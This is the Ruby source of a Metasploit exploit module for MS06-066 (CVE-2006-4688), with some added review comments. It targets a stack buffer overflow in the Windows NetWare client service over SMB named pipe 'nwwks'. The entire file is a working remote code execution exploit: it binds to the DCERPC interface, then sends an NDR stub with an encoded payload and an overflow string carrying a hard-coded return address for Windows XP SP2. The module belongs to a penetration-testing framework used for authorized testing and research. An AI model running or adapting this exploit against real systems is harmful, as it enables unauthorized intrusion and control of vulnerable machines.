GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/smb/ms06_066_nwwks.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
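class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  # Interface UUID the module binds to over the named pipe. The default pipe
  # ('nwwks') and this UUID are what actually select the target service.
  NWWKS_UUID = 'e67ab081-9844-3521-9d32-834f038001c0'.freeze

  # Opnum of the function that receives the overlong string.
  VULN_OPNUM = 0x01

  # Stub data the original author keyed the `exploit` return value on.
  # NOTE(review): the meaning of this 12-byte value is not documented here —
  # presumably the ordinary return of opnum 1 when the service did not crash;
  # confirm before relying on it for anything beyond the boolean below.
  EXPECTED_STUB = "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00".freeze

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS06-066 Microsoft Services nwwks.dll Module Exploit',
      # NOTE(review): the module name, default pipe and UUID target nwwks, but
      # this text names nwapi32.dll. Likely a copy-paste from the sibling
      # nwapi module; confirm against upstream and correct the text if so.
      'Description' => %q{
        This module exploits a stack buffer overflow in the svchost service, when the netware
        client service is running. This specific vulnerability is in the nwapi32.dll module.
      },
      'Author' => [ 'pusscat' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2006-4688'],
          [ 'OSVDB', '30260'],
          [ 'BID', '21023'],
          [ 'MSB', 'MS06-066'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      # The overflow is in a service process (svchost per the description),
      # so a successful payload does not run as the SMB user.
      'Privileged' => true,
      'Payload' =>
        {
          'Space' => 1000,
          'BadChars' => "",
          'Compat' =>
            {
              # -ws2ord XXX?
            },
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'Windows XP SP2',
            {
              # NOTE(review): hard-coded address in one modemui.dll build;
              # other language/service-pack builds may place it elsewhere.
              'Ret' => 0x616566fb, # modemui.dll [esp + 16]: popaw, ret
            },
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2006-11-14'))

    # The option text previously listed pipes from unrelated modules
    # (browser, srvsvc, ...); the bind below only makes sense on nwwks.
    register_options(
      [
        OptString.new('SMBPIPE', [ true, "The pipe name to use (nwwks)", 'nwwks']),
      ])
  end

  # Connects to SMB, binds to the nwwks interface on the configured pipe and
  # sends the overlong request. A missing or disconnected reply is treated as
  # the expected result of the overflow; any other error is re-raised.
  #
  # Returns true when the service replied with EXPECTED_STUB, false otherwise.
  # (The framework does not consume this value; it is kept for compatibility.)
  def exploit
    stubdata = build_overflow_stub

    print_status("Connecting to the SMB service...")
    connect()
    # Credentials come from the SMB mixin's datastore options (SMBUser/SMBPass);
    # NOTE(review): whether the target accepts an anonymous session is not
    # established here.
    smb_login()

    # SMBPIPE is operator-controlled by design; it is only used to name the endpoint.
    handle = dcerpc_handle(NWWKS_UUID, '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    print_status("Calling the vulnerable function...")

    begin
      dcerpc.call(VULN_OPNUM, stubdata)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      print_status('Server did not respond, this is expected')
    rescue => e
      # Only a pipe disconnect is an expected failure mode; surface anything else.
      raise e unless e.to_s =~ /STATUS_PIPE_DISCONNECTED/
      print_status('Server disconnected, this is expected')
    else
      print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}")
    end

    # Cleanup
    handler
    disconnect

    expected_response?
  end

  private

  # Builds the NDR stub for the vulnerable opnum. The original author's IDL
  # note for the call was:
  #   [in] [unique] wchar *
  #   [in] [unique] wchar *
  #   [out] long
  # The payload travels in the second string; the last string overflows the
  # stack buffer and carries the return address.
  def build_overflow_stub
    # UNC prefix, 292 bytes of filler, little-endian return address, wide NUL.
    ofstring = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00"

    NDR.long(rand(0xffffffff)) +
      NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
      NDR.long(rand(0xffffffff)) +
      NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") +
      NDR.long(rand(0xffffffff)) +
      NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
      NDR.long(rand(0xffffffff)) +
      NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") +
      NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)
  end

  # True only when a response was recorded and its stub data equals EXPECTED_STUB.
  def expected_response?
    resp = dcerpc.last_response
    !resp.nil? && resp.stub_data == EXPECTED_STUB
  end
end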